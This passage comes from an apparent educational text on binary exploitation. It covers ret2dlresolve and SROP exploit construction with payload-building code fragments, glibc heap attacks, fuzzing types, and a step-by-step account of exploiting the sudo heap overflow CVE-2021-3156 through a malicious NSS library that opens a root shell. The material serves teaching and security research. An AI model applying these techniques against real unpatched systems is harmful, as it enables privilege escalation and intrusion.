4.4 ret2dlresolve
Technique for executing dynamically linked functions without knowledge of their addresses.
The attacker tricks the binary into resolving a function of its choice into the Procedure
Linkage Table, bypassing ASLR.
When the binary calls a dynamically linked function for the rst time and has lazy binding
enabled (no RELRO or Partial RELRO), it is going to jump into the PLT section to try to
resolve the symbol on demand.
4.4.1 Structures
In order to resolve a symbol, 3 structures are needed. By faking them, we could trick the
loader to resolve a symbol of our choice.
4.4 ret2dlresolve 27
JMPREL JMPREL
Corresponds to the rel.plt segment and

holds the relocation table. This table
r_offset r_info
maps a symbol to an oset on the GOT.
0x0804a00c 0x00000107
The r_info eld gives us the index of the
symbol on the SYMTAB.
SYMTAB SYMTAB
Symbol table. Stores information about st_name st_...

the symbols. The most important eld
for this exploit is st_name which is the 1: 0x1a ...
oset on the STRTAB structure.
STRTAB STRTAB
String table. Stores the name of the sym-

0x804822d: libc.so.6
bols.
0x8048246: read
4.4.2 Symbol resolution

When linking, the linker is going to replace every dynamic call to an entry on the PLT table,
located on the .plt table. The PLT table contains executable code formed by stubs. This
stubs will jump to the GOT table to try to execute the intended function if it is resolved
but if the function is not present on the GOT table (the function has not been resolved yet)
the GOT code will return to the PLT entry to call the resolver.
The process for calling a dynamic function is the following:
1. Control is transferred to the .plt entry of the function, for example puts@plt.
2. That .plt entry gets a value from the .got section. This value can have two dierent
interpretations:
(a) If the symbol has been previously resolved, the value points to where the function
has been loaded at runtime.
i. Control is transferred to the resolved function, for example puts@libc.

(b) If the symbol has not been previously resolved, the value points back to a dierent
part of the symbol entry on the .plt.
i. Push the reloc_index. This argument is the entry index on the JMPREL
table.
ii. Jump to the default entry stub on the .plt.

A. Push the link_map into the stack.
B. Call __dl_runtime_resolve.
iii. Call the resolved symbol.
Every time a symbol is resolved via __dl_runtime_resolve, the corresponding GOT entry
is updated to point to the resolved address.
Figure 4.19: __dl_runtime_resolve execution path
__dl_runtime_resolve receives as parameters the link_map and the reloc_index in the

stack, even for x86_64 systems. Then it will move this parameters into rsi and rdi
respectively and call _dl_fixup, which is the resolver.
The source code for the __dl_runtime_resolve function can be found on the glibc source
code.
Faking the data structures and passing them to __dl_runtime_resolve() eectively cor-
rupts the GOT table and hijacks function calls.
__dl_runtime_resolve is in reality only a wrapper for _dl_fixup, which in turns does
all the heavy lifting for the symbol resolution. Here we can nd all the computations
needed to link the JMPREL, SYMTAB and STRTAB structures together to get the symbol
information.
Listing 4.4: _dl_fixup pseudocode.
1 #define ELF64_R_SYM ((i) >> 32)

2
3 void* _dl_fixup(struct link_map* l, Elf64_Word reloc_arg) {
4 Elf64_Rela* reloc_entry = JMPREL + (reloc_arg * sizeof(Elf64_Rela));
5 Elf64_Sym* = symbol_entry = SYMTAB[ELF64_R_SYM(reloc_entry->r_info)];
6 const char* symbol_string = STRTAB + symbol_entry->st_name;
7 /* ... */
8 }
Example
Now we can use a buer overow to trick __dl_runtime_resolve into resolving the symbols
of our choosing. To do that, we need to jump to the start of the .plt section, where the
code for pushing the link_list and calling __dl_runtime_resolve is found. Before the
jump we need to set on the top of the stack the index on the JMPREL that we want to
resolve. This index will have to point to our fake data structures, written on some buer,
attending the previous formula.
1 Elf64_Rela* reloc_entry = JMPREL + (reloc_arg * sizeof(Elf64_Rela));
The address of JMPREL can be found by examining the ELF headers of the executable. If
the binary has PIE enabled, the value will be an oset from the image base; if PIE is not
enabled, the value is an absolute address.
1 readelf -d a.out | grep -e JMPREL -e STRTAB -e SYMTAB
Figure 4.20: Addresses of the most important tables for the exploit
reloc_arg has as type Elf64_Word, an alias for a 32bit unsigned integer. That imposes a
restriction: The distance between the JMPREL and our fake data cannot be greater than
0xffffffff × sizeof(Elf64_Rela) = 0x17FFFFFFE8. Often we only can write to the stack,
which is usually too far away from the JMPREL. In order to be in range, we will need to
call a read into a more proper location. This exploit is going to have 2 stages:
1. ROP chain to write our fake data structures in another buer near JMPREL, SYMTAB
and STRTAB.
2. Jump to __dl_runtime_resolve with reloc_arg pointing into the fake data struc-
tures.
Stage 1
A simple ROP chain to call read on a convenient address that will write the fake data
structures to feed them to the resolver.
20 exploit = b"A" * 64 # buffer

21 exploit += b"A" * 8 # rbp
22 exploit += p64(nop_gadget)
25
26 exploit += p64(set_regs_for_read_gadget)
27 exploit += p64(0) # stdin_fileno
28 exploit += p64(fake_data_addr) # buffer
29 exploit += p64(fake_data_len) # buffer len
30 exploit += p64(syscall_gadget) # read
The section where the buer for the fake data will be written must have RW permissions
and must be mapped after the tables. To nd such a section we can search on the ELF
section headers.
Figure 4.21: .data and .bss segments of the process
Figure 4.22: Mapped segments of the process
I will use the last portion of the last segment of a.out, the address 0x403e00. Because of
(0x403e00 − 0x400480) mod 0x18 ≡ 8
the rst two bytes of the second buer will be padding for the relocation entry, that is
going to start at 0x403e10, which is divisible by 24. Now we compute the value that
__dl_resolve_runtime requires to nd the symbol.
(0x403e10 − 0x400480)
= 0x266
0x18
That will be the relocation index passed as a parameter to the resolver.
0x3a50
0x3a98
SYMTAB STRTAB JMPREL rel sym system

0x3990
0x43e00
Figure 4.23: Osets from the tables to the second buer

Stage 2
Now we ll the entries in sequence. For the relocation entry, the important eld is r_info.
In x86_64 Linux systems, 32 highest bits of this eld hold the oset from the SYMTAB to
the symbol entry. The lowest 32 bits stores the type of relocation. To bypass a check in
_dl_fixup these bits must be set to 7. The Elf64_Rela struct has one more eld of 64 bits
but since this eld is unused, I overlapped it with the symbol entry. This trick also helps
me with padding as 0x403e18 is not aligned with SYMTAB. The computation for the index
of the symbol entry follows the same scheme that the relocation oset.
42 exploit += p64(got_entry_after_read) # Elf64_Rela.r_offset

43 exploit += p32(0x7) # Elf64_Rela.r_info low
44 exploit += p32(0x271) # Elf64_Rela.r_info high
45
46 exploit += p32(0x3a50) # Elf64_Sym.st_name
47 exploit += p8(0x0)
The symbol entry has been zeroed out except for the st_name eld which stores the distance
in bytes from STRTAB to a string
52
53 exploit += b"system\x00\x00"
54 exploit += b"/bin/sh\x00"
55
56 with open("wer", "wb") as f:
57 f.write(exploit)
Now, going back to the ROP chain, we need to invoke __dl_runtime_resolve emulating
a legitimate call. To do this, before calling the resolver we need to set up the arguments
for system as it is was already resolved and we were calling it directly: with rdi pointing
to "/bin/sh". Chaining a pop rdi; ret gadget followed by the address of the "/bin/sh"
string that we put on the second buer, after the system string. Once the argument is
correctly set, the following byte on the ROP chain should be the address of the start of the
.plt section, that as shown in 4.19 stores a default stub for calling the resolver, pushing the
link_map into the stack and jumping into __dl_runtime_resolve.
32 exploit += p64(rdi_gadget)
33 exploit += p64(binsh_addr)
34 exploit += p64(plt_start)
35 exploit += p64(reloc_arg)
36 exploit += p64(return_addr)
37 exploit += p64(binsh_addr)
Figure 4.24: Bytes of the exploit
Figure 4.25: Successful exploitation of an ret2dlresolve attack
4.5 Sigreturn-oriented programming

Sigreturn-oriented programming (SROP) exploits the mechanism of handling signals on
POSIX systems. These systems implement the sigreturn system call, tasked with restoring
the CPU registers with stack values, among other things. By corrupting stack values, an
attacker can set the CPU register values at will.
4.5 Sigreturn-oriented programming 33
4.5.1 Signal handler mechanism

When a signal is triggered, a context switch is performed. A context switch implies that the
state of the current execution must be saved, that is, all the CPU registers are pushed onto
the stack along with some additional data. Once the signal has been handled, a sigreturn
system call is called and the CPU registers values are restored.
4.5.2 sigcontext struct

When the sigreturn syscall is called, it expects to found a sigframe struct on the top of
the stack. The sigframe is a structure that holds several pieces of information for restoring
the context of the process. One of these pieces is the sigcontext struct. The sigcontext
struct stores the values of the CPU registers, its ags and the state of the oating point
unit. Its denition is dependent on architecture and operating system, but for example, the
denition for Linux x86 and x86_64 systems can be found in the Linux kernel source.
4.5.3 SROP
SROP is all about creating a fake signal frame on the stack and call sigreturn to control
all the registers on the CPU. First, the call to the syscall is triggered with conventional
ROP gadgets. On Linux systems, syscalls are invoked in function of the value of rax when
the syscall instruction gets executed. The rax value for the sigreturn 0xf on
syscall is
x86_64 bit Linux systems and 0x77 for x86 bit Linux systems.
Once we placed the correct value on rax and executed syscall, sigreturn is going to be
executed by the kernel, and it expects a signal frame on the top of the stack. By setting the
correct values on the signal frame we can control what we are going to execute next.
0x00 rt_sigreturn uc_flags

0x10 &uc uc_stack.ss_sp
buffer uc_stack.ss_flags
0x20 uc_stack.ss_size
0x30 r8 r9
rbp 0x40 r10 r11
0x50 r12 r13
rax gadget
0x60 r14 r15
syscall gadget 0x70 rdi rsi
0x80 rbp rbx
0x90 rdx rax
0xa0 rcx rsp
0xb0 rip eflags
signal frame
0xc0 cs/gs/fs/ss err
0xd0 trapno oldmask
0xe0 cr2 &fpstate
0xf0 __reserved sigmask
Figure 4.26: Layout of a SROP exploit in Linux x86_64[5]

Example
First, we need a simple ROP chain that calls a system call. For that we need a pop rax
gadget that sets the correct syscall number on the rax register. Then we execute the syscall
instruction with a syscall gadget. The sigreturn syscall has the number 0xf.
Figure 4.27: SROP gadgets
15 exploit = b"A" * (padding)

16 exploit += p64(rax_gadget) # rip
17 exploit += p64(sigreturn_syscall_number)
18 exploit += p64(syscall_gadget)
Up to this point this is a normal ROP chain sequence. Now we need to concatenate the
sigcontext struct for the sigreturn syscall.
We are going to call execve("/bin/sh") from the signal frame. In order to do that, we
need to set the correct registers.
rdi : executable le path to run. In our case it is the address of a "/bin/sh" string.
rax : 0x3b, the execve syscall number.
rsp : zeroing this value can be dangerous and cause a segfault. Just point it to some
random stack address.
rip : because execve is a system call we can reuse the syscall gadget we used previously
on the ROP chain.
cs : code segment. Used implicitly in the instructions that modify control ow. Necessary
to jump around. The value is taken from debugging the program.
ss : another segment register. Zeroing it causes segfault. The value is taken from debug-
ging the program.
All the other elds are zeroed out.

4.5 Sigreturn-oriented programming 35
Figure 4.28: SROP payload

Figure 4.29: Successful exploitation of an SROP exploit

Chapter 5
Heap exploits
5.1 The heap

The heap is a common term to refer to a portion of memory where programs can allocate
memory at runtime for objects whom size is very large or unknown at compile time, and
therefore, the compiler cannot manage the stack for them. This portion of memory is very
often managed by libraries called allocators, in charge of keeping a record of the allocated
and freed memory, its size, the possibility of reusing freed chunks and the merging of freed
chunks to avoid heap fragmentation.
The C standard includes denitions for a set of heap functions common for everyone but
the implementation is OS and library-dependent.
malloc
realloc
calloc
free
5.2 glibc malloc

The GNU C malloc library contains implementations for the standard malloc functions,
malloc, free, realloc, and calloc. This allocator manages the blocks of memory handled
to a program in a "heap" style. The GNU malloc implementation is derived from ptmalloc
(pthread's malloc) and in turn, ptmalloc derives from dlmalloc (Doug Lea's malloc).
5.2.1 Common terms

Arena
An arena is a region of memory dedicated to the allocator. Arenas hold references to one
or more heaps from which they allocate and free memory. When a program is started, a
main arena is created, that holds a reference to the initial heal. When more threads request
allocations, more arenas can be created to avoid locking the main arena and causing a
bottle-neck that could slow down the program.
37
38 Heap exploits
Heap
Portion of memory reserved for allocations. This memory is subdivided into chunks handled
by the allocator. Heap memory is contiguous, meaning that the are adjacent to one another.
Chunk
Subdivision of a heap. It is a block of memory with a certain size requested by the pro-
gram. Chunks can be merged with neighboring chunks to obtain a larger chunk, or can be
subdivided further to obtain smaller chunks, depending on the needs of the program.
When a chunk is freed, it gets pushed into a circular double-linked list called bin. To
save up space, all the information required for the linked list management is stored on the
chunk contents. This metadata includes forward and backward pointers and the size of the
neighboring chunks. [source code]
size ags size ags
fwd pointer
bck pointer
contents contents
...
previous size
Figure 5.1: Allocated chunk structure Figure 5.2: Freed chunk structure
Tcache
The Thread Local Cache is a special list of very recently freed chunks with the intention to
be of quick access. It acts as a cache for freed chunks. Each thread owns a tcache containing
a small collection of freed chunks for rapid access without the need to lock global variables or
data structures like the arena, which is common for all threads under a process, to prevent
data races.
The data structure is an array of bins, each bin being a linked list for chunks of certain sizes.
tcache
size bin
0x20 ...
0x30 ...
0x40 ...
0x50 0x55aabb -> 0x55ccdd -> 0x0
Figure 5.3: Tcache structure
This optimization is present from glibc version 2.26 upwards.

5.3 Heap overows 39
5.3 Heap overows

Because chunks are contiguous in memory, we can overow a heap buer with more data
than it can handle using unbounded write/read functions, just like a normal stack overow.
write
size ags contents size ags contents
Figure 5.4: Heap overow
Example
To showcase this vulnerability I am going to solve the level heap-one from Phoenix VM .
1 struct heapStructure {
2 int priority;
3 char *name;
4 };
5
7 struct heapStructure *i1, *i2;
8
9 i1 = malloc(sizeof(struct heapStructure));
10 i1->priority = 1;
11 i1->name = malloc(8);
12
13 i2 = malloc(sizeof(struct heapStructure));
14 i2->priority = 2;
15 i2->name = malloc(8);
16
17 strcpy(i1->name, argv[1]);
18 strcpy(i2->name, argv[2]);
19 // ...
Thanks to the structures and the unbounded writes with the strcpy functions we can trigger
an arbitrary write exploit. The second call to strcpy &name from the
will take as a pointer
second struct. Because heap chunks are contiguous, the rst strcpy call can keep writing
data past the extent of i1.name into the second structure.
i1 i2
priority padding &name name priority padding &name name
strcpy &return_address
&winner
Figure 5.5: heap-one@phoenix

40 Heap exploits
We will use the rst strcpy to override i2.name to point to another address where the value
on the second argument will be written. In this case, I am overwriting it with the address
of the return address on the stack and the second argument has the address of the winner
function, performing a classical ret2win exploit but overriding data on the heap.
Listing 5.1: Pseudocode of the exploit
1 strcpy(&return_address, &winner);
Figure 5.6: heap-one solved
5.4 Use-After-Free
An Use-After-Free vulnerability consists of the use of a chunk after it has been freed.
2 #include <string.h>
3
4 int main()
5 {
6 char* buffer = malloc(sizeof(char) * 32);
7
8 free(buffer);
9
10 /* buffer still points to the chunk contents */
11
12 memset(buffer, 0x41, sizeof(char) * 32);
13
14 return 0;
15 }
Example
To exemplify an UAF I will use heap-two from Phoenix VM .
This program consist of a menu allowing us to perform some actions in arbitrary order over
some global variables. The program will check for the value of a variable inside the auth
struct. By allocating and then freeing it we can force the following call to malloc returns
us the same chunk that was allocated for the auth struct. Because the auth pointer is
never cleared it points to the chunk that now belongs to the service variable, which we can
control. By writing on service we are also writing on auth, therefore setting the correct
value that the challenge expects to be completed.
5.5 Double free 41
Figure 5.7: heap-two@Phoenix
5.5 Double free

A double free consists of calling free two consecutive times on the same chunk. This causes
a corruption on the allocator's data structures: the same chunk is appended two times to
the free chunks list and the subsequent mallocs are going to return the same chunk to two
dierent calls.
2
3 int main()
4 {
5 void* a = malloc(8);
6 append
append
7 free(a);
8 free(a);
free bin a's chunk a's chunk
11
12 void* b = malloc(8); malloc
13 void* c = malloc(8);
malloc
14
15 /* b and c point to the same address */
16
17 return 0;
18 }
Figure 5.8: Double free vulnerability

42 Heap exploits
Example
This is the fastbin_dup.c exercise from how2heap
First, we allocate three chunks on the heap, a, b and c. Ideally, we only need one chunk: the
other pointers are needed to bypass some security checks to prevent this kind of vulnerability.
Then, we free a.
Free b and then, again a. We have included a's chunk two times on the bin.
Now the heap allocator is going to think they are two dierent chunks and hand them to
two dierent malloc calls.
Remember that the variables a, b and c points to the chunk contents, meanwhile the
addresses shown in the fastbins are the addresses of the chunks.
5.6 Unlink 43
5.6 Unlink
This attack exploits the UNLINK macro used in the free function. This macro executes
the following instructions, redoing the connections between nodes on the double-linked
list.
1 #define unlink(P, BK, FD) {

2 FD = P->fd;
3 BK = P->bk;
4 FD->bk = BK;
5 BK->fd = FD;
6 }
FD and BK are pointers to the next and previous chunk of P. If the attacker can control the
chunk to be unlinked, P, we can put arbitrary values on FD and BK.
Imagine the following setup:
size ags
arbitrary memory location
0x5655d804
0x5508f311
contents
...
previous size
arbitrary value
Figure 5.9: User controlled chunk
Following the unlink macro execution:
FD = 0x5655d804
BK = 0x5508f311
*(0x5655d804 + 0xc) = 0x5508f311
*(0x5508f311 + 0x8) = 0x5655d804
That is an arbitrary write. The values on FD and BK should take in account the oset on the
struct. For example, FD should point to an address 0xc bytes lower than the actual address
we want to write to.
Newer glibc versions patched this exploit by adding sanity checks for the chunk headers.
This exploit no longer works on the newer glibc versions.
44 Heap exploits
Chapter 6
Fuzzing
6.1 Introduction
Software has bugs. This whole text depends on it. But nding bugs may not be as trivial
as it seems. Software can be complex, and remembering all the corner cases for all the lines
of code, taking into account how they interact with each other, is an illusion. By human
mistake or lack of knowledge, programmers can introduce bugs in their software, sometimes
very hard to reproduce or with very particular triggers.
Fuzzing means to use automatically generated tests to perform software testing[34]. Fuzzing
searches exhaustively on the input space (bruteforce) of a program, searching for faulty
inputs that may cause misbehavior by the software. This technique has been very successful
on nding security bugs on software in the last decade and has gained a lot of popularity.
It is in fact, a critical component of software testing even for production environments.
6.2 Code coverage

It is a metric which measures how much of the program has been executed. This metric
helps to know how complete a test has been. By using code coverage we can quantify
the usefulness of the input cases generated by the fuzzer and optimize the fuzzing session.
Coverage can be dened on dierent criteria:
Functions executed.
Statements executed.
Edges taken.
Branches taken.
Conditions resolved.
6.3 Types of fuzzers

Fuzzers are typically classied in 3 dimensions.
45
46 Fuzzing
6.3.1 Input seed

Generative
The fuzzer generates the input from scratch, usually by random methods. This technique
has as advantages the ease of implementation, does not require a corpus of examples and
can generate a broad spectrum of input cases, but present the disadvantage of generating
a lot of uninteresting inputs . Because of its triviality only uncovers shallow bugs in non
trivial programs and takes a lot of time and eort to generate input cases that go down in
the program execution tree.
Mutations
The most part of randomly generated inputs are not syntactically valid and do not go further
on a program path. Mutation-based fuzzers apply certain transformations (mutations) to
already existing examples of input to produce new input, thus they require a corpus. These
mutations usually retain the structure of the input, if there is one. Because of the similarity
between the generated input and the corpus examples the fuzzer can focus on interesting
cases that go deep in the program execution tree, but it is not as exhaustive as the generative
method. Some common mutations include:
Bitips
Arithmetic
Removing/Adding bytes
Swapping bytes
Repeating bytes
Inserting UTF characters into ASCII strings
Removing/Adding new lines, null terminators, EOFs, ...
Replacing numbers for known problematic ones, i.e. negatives, big integers, oats, ...
6.3.2 Input structure

Unstructured
The fuzzer does not know the structure of the input. Requires less setup for fuzzing and
can be employed in a wide variety of programs. This technique is more exhaustive than
structured data but can generate a lot of uninteresting input cases for programs that expect
structured data, which means wasting CPU cycles. It also takes longer to explore the
program execution tree.
Structured
The format of the input is specied to the fuzzer. Then the fuzzer can generate new inputs
from this specication. It is specially useful for fuzzing highly structured data like protocols,
le formats or sequences of mouse clicks or keyboard events, etcetera. The goal of structured
input is to reduce the number of trivial inputs that are going to be rejected quickly by
the target program, achieving a deeper exploration of the program execution tree than
unstructured input. Generally, the input format is specied as a formal grammar.
6.3 Types of fuzzers 47
6.3.3 Program knowledge

Blackbox
The fuzzer is not allowed to scan or analyze the internals parts of the program. The exe-
cutable is treated as a black box that receives input and prints output. The fuzzer generates
inputs for the target program without knowledge of its internal behavior or implementa-
tion. Because this technique does not modify the source code, nor injects instrumentation
and does not analyze test coverage after each execution, there are no overheads at runtime,
making it suitable for large or slow binaries. It does not need access to the source code.
Whitebox
The fuzzer is allowed to analyze the whole program. The goal is to track and maximize
code coverage. This is done by adding instrumentation to the original source code and
required compilation. This instrumentation is just a logger that registers when a checkpoint
is reached along the execution path of a program. Target checkpoints are usually function
prologues and epilogues, jumps and conditional statements.
Thanks to all this structural analysis of the program the fuzzer can triage inputs depending
on how much code coverage they contribute, if new paths have been discovered, or which
types of input ow through one path or another. This makes this technique the most
eective at nding deep hidden bugs. The downside is the overhead of the instrumentation
and that for every execution, the output feedback must be analyzed by the fuzzer to continue
generating input, plus one does not always have access to the source code or cannot compile
the program.
Greybox
Greybox fuzzing tries to maintain the benets of whitebox fuzzing while minimizing its
downsides. It also uses instrumentation, but much lighter, instrumenting certain les or
instructions and without analyzing the whole program. This technique is the most popular
of the three as the top big 3 fuzzers AFL, HongFuzz and LibFuzzer use the greybox technique.
48 Fuzzing
Chapter 7
Practical case
7.1 CVE-2021-3156
On 2021-01-26, the Qualys Research Team disclosed a vulnerability on the sudo command
that allowed privilege escalation via heap overow[25].
The sudo program is a utility for UNIX systems that allows a user to run programs with the
privileges of another user. It comes installed by default in almost all Linux distributions.
The aected versions go from 1.8.2 to 1.8.31p2 for legacy versions and from 1.9.0 to 1.9.5p1
for stable versions. Exploits have been tested for Ubuntu 20.04, Debian 10, Fedora 33,
MacOS Big Sur.
7.1.1 Weakness
The weakness exploited is an o-by-one error (CWE-193). That means that the range for
a loop is wrongly calculated to do more iterations than intended.
Listing 7.1: Example of o-by-one
1 char from[] = {0x41, 0x41, 0x41, 0x41, '\\', 0x0, 0x41, 0x41, 0x0};
2 char* to = malloc(sizeof(char) * strlen(from) + 1);
3
4 while(*from)
5 {
6 if(from[0] == '\\')
7 from++;
8 *to++ = *from++;
9 }
7.1.2 Bug
Vulnerability identication
In set_cmnd() heap overow could happen if a command line argument ends with a back-
slash. A buer is allocated on the heap to store the user provided arguments. To know the
length of the buer it iterates over argv and calls strlen that stops on a null termination
49
50 Practical case
byte.By changing the arguments provided to sudo we can control the size of the
heap allocated buer.
Listing 7.2: sudoers.c:set_cmnd

1 size_t size, n;
2
3 /* Alloc and build up user_args. */
4 for (size = 0, av = NewArgv + 1; *av; av++)
5 size += strlen(*av) + 1;
6
7 if (size == 0 || (user_args = malloc(size)) == NULL) {
8 sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
9 debug_return_int(-1);
10 }
Later, the program rewrites the argv values on the newly allocated buer. But inside the
transferring code there is an o-by-one bug hidden. By providing a backslash on the input
we can make the from pointer advance two positions on an iteration, jumping over the
null byte that would stop the copying.
Listing 7.3: sudoers.c:set_cmnd

1 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) {
2 /* ... */
3 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) {
4 for (to = user_args, av = NewArgv + 1; (from = *av); av++) {
5 while (*from) {
6 if (from[0] == '\\' && !isspace((unsigned char)from[1] ))
7 from++;
8 *to++ = *from++;
9 }
10 *to++ = ' ';
11 }
12 /* ... */ AAAAAAAA \ 0x0 more data
13 }
14 /* ... */
15 }
Figure 7.1: Out-of-bounds access
1. While *from is dierent from 0x0 keep looping
(a) from[0] points to the backslash and from[1] points to the null termination byte.
i. from gets incremented and now points to the null termination byte, skipping
over the backslash.
(b) The null byte is copied into the buer and from gets incremented. Now from is
pointing to the data after the null byte.
7.1 CVE-2021-3156 51
This way, the while loop will copy more data than was previously calculated, writing outside
of the heap allocated buer and overwriting critical data on the heap chunks.
Reaching the vulnerable code

sudo works by setting a mode of operation based on how the user invoked the command.
Dierent modes of operation trigger execute dierent parts of the code. To trigger the
vulnerable code, the following condition for the sudo mode must be set.
MODE_SHELL ∧ (MODE_EDIT ∨ MODE_CHECK) ∧ ¬MODE_RUN
MODE_RUN must be turned o because it will trigger code that escapes special characters on
the command line arguments. That obviously will prevent us from triggering the bug.
MODE_EDIT or MODE_CHECK are set manually via command line options, -e and -e, a check on
parse_args() turns o MODE_SHELL. But calling sudoedit instead of sudo automatically
sets MODE_EDIT without unsetting MODE_SHELL.
MODE_SHELL can be set via command line option -s.

Therefore, by calling sudoedit -s we can reach the vulnerable code.
Figure 7.2: Unpatched sudo behaviour
Figure 7.3: Patched sudo behaviour
7.1.3 Exploitation
Overowing with data
Once we know we can overow the heap buer, we need targets. In their report, the Qualys
team rst tried to abuse locale related settings to turn the buer overow into a format
string vulnerability. In the process they implemented a fuzzer to play around with LC_x
environment variables. The initial plan ended up failing ultimately but thanks to the fuzzer
they produced dozens of unique crashes, from which they exploited three cases.
Here I am going to discuss an implementation for the second case they presented: overwriting
the name of a library loaded at runtime.
52 Practical case
Figure 7.4: Relevant calls in sudo
Name Service Switch

NSS is a name resolution mechanism for UNIX-like systems. It is based on a group of
databases that contain information about certain names.
Sudo uses this mechanism to check for permissions.
Listing 7.4: sudoers.c
1 cmnd_status = set_cmnd();
2 /* ... */
3 validated = sudoers_lookup(snl, sudo_user.pw, FLAG_NO_USER | FLAG_NO_HOST,
pwflag);
Then sudoers_lookup starts a chain of calls that arrives at __nss_lookup_function.

__nss_lookup_function calls nss_load_library, that loads a library specied by a name
as it was a dynamically linked library with __libc_dlopen. Because all these structures
are allocated in the heap we can load an attacker controlled library by overwriting the name
eld of a service with the heap overow on set_cmnd.
7.1 CVE-2021-3156 53
Figure 7.5: NSS data structures
In this case, sudo will try to load the service les from the database group. If we overwrite
the name eld of the service structure we will control what library sudo is going to load.
To make sure we do not override anything that could cause a segmentation fault before
nss_load_library is called we need to allocate the user input buer closely to the chunk
where this data structure is allocated. To ensure we get the chunk we want, we need to
employ a special technique: heap feng shui.
1 typedef struct service_user

2 {
3 /* And the link to the next entry. */
4 struct service_user *next;
5 /* Action according to result. */
6 lookup_actions actions[5];
7 /* Link to the underlying library object. */
8 service_library *library;
9 /* Collection of known functions. */
10 void *known;
11 /* Name of the service (`files', `dns', `nis', ...). */
12 char name[0];
13 } service_user;
54 Practical case
Heap feng shui

This technique aims to modify and inuence the heap layout. Thanks to the defragmentation
routines of the allocator's implementation and certain tables for reusing previously allocated
chunks the heap is very dynamic in its layout. By allocating chunks of certain sizes and
freeing them, we can force posterior allocations to use the previous chunks instead of creating
new ones and vice versa. We just need to nd the correct sizes to enforce a certain layout,
one layout that is favorable to the attacker. The goal for this exploit is to set a chunk as
the rst chunk in any of the tcache's lists. This chunk is special in the sense that it is the
previous chunk after the chunk where the group:les NSS service is allocated. This layout
must be accomplished just right before the allocation of user_args in set_cmnd. We can
claim this chunk with a user input with the same size as the tcache's list where it is located.
tcache
0x20 ...
0x30 ...
0x40 ...
0x50 0x55aabb
0x55aabb
... freed chunk group:les service
1 user_args = malloc(0x50); /* return chunk from tcache */
0x55aabb
... user_args group:les service
Figure 7.6: Intended heap layout
Now, we need to nd some code that we can control to make all the allocations and frees
needed to shake the heap around. setlocale is a function used to set locale and language
setlocale performs quite
related settings for ease of translation at runtime. It turns out that
mallocs and frees with environment variables used for locale settings: LC_CTYPE,
a lot of
LC_TIME, LC_MONETARY, just to name a few. Because they are environment variables we can
control their size and their contents, just what we needed to implement the heap feng shui
technique.
I wrote a bruteforcer that will play around with the values for LC_* variables and observe
the state of the heap and the tcache. If the tcache holds a chunk ready to be allocated that
is before the chunk where group:les is allocated then a solution is found.
7.1 CVE-2021-3156 55
Figure 7.7: Printing the heap layout while bruteforcing
Overwriting with environment variables

Now that we got our desired chunk, we just need to overow it with data. Because we already
used the user input to set the size of the chunk we wanted from the tcache we need to nd
another way in for the extra data. Revisiting the set_cmnd, on the lines where the overow
happens, taking a look at the variables from, we can see it is a pointer into the stack, where
the C runtime environment puts the arguments supplied to the command. Further down
the stack (towards the higher addresses) the C runtime also puts the environment variables,
being adjacent to the arguments.
This means that the from variable will point to the environment variables. There is where
we want to put the payload for the overow.
0x55aabb
Environment variables
... user_args group:les service
Figure 7.8: Overow
First we need some padding to compensate for the oset where the actual data of the chunk
starts versus where the chunk starts. Then we can set the new contents for the group:les
service. Lastly, put the LC_* variables that the bruteforcer found as a solution.
56 Practical case
Evil library
For the hijacked library, we are going to make a dynamically linked library that calls
execve("/bin/sh") on the constructor. When the library gets loaded, it will automati-
cally start execution of the constructor function and open a root shell for us. It is important
for the library to be present at the same directory the exploit is executed and to be inside
a folder called libnss_${name}, where name is the name of the library.
Figure 7.9: Successful exploit

Appendix A
CVEs and CWEs
A.1 CVE Program

The Common Vulnerability and Exposures program is a system to identify and classify
publicly disclosed cybersecurity vulnerabilities. It is a database holding records for each
vulnerability identied and disclosed by researches and organizations. CVE records are
used to ensure common denitions for issues.
A.1.1 CVE IDs

A CVE ID is the unique identier used to refer to a vulnerability on the CVE database. The
identier follows as a format the CVE prex, followed by the year of the registration, ended
by arbitrary digits. For example, the CVE ID of the vulnerability showed on the Chapter
7.1 nicknamed "Baron Samedit" by its authors at Qualys is CVE-2021-3156: being 2021 the
year of registration.
A.1.2 CNAs
CVEs are assigned by CVE Numbering Authorities, being them formal and partnered organi-
zations with the CVE Program. When a researcher or organization nds some vulnerability
they request a CNA to assign a CVE ID to the vulnerability and registers it to the CVE
database as a record only if the vendor or owner of the software allows to publicly disclose
the vulnerability.
A.2 CWE Program

The Common Weakness Enumeration is a public database of common software and hardware
weakness types that could lead to security issues. The goal is to educate software and
hardware engineers on how to stop vulnerabilities at the source by identifying and classifying
these weaknesses in a taxonomy. The records of the database also contain examples, related
weaknesses, consequences, mitigations, among other things to help the users preventing
vulnerabilities.
57
58 CVEs and CWEs
List of Figures
1.1 Simplied stack timeline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1

1.2 Standard C 32-bit calling convention stack layout . . . . . . . . . . . . . . . . 2
1.3 Buer on the stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.4 Stack4@Phoenix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.5 man 3 gets: Bugs section . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.6 Exploiting Stack4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.7 Stack osets between debugged process and non debugged process . . . . . . 6
2.1 Stack canary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.2 foo function without and with stack canary . . . . . . . . . . . . . . . . . . . 9
2.3 man gcc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.4 libc base address loaded at runtime with ASLR enabled/disabled . . . . . . . 12
3.1 Format function stack frame . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

3.2 Format string vulnerability . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
3.3 Anatomy of an arbitrary read format string exploit . . . . . . . . . . . . . . . 15
3.4 Address of s3cr3t on the input buer . . . . . . . . . . . . . . . . . . . . . . 16
3.5 Value of s3cr3t leaked . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
3.6 Compiled with stack canaries . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
3.7 win() function executed. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
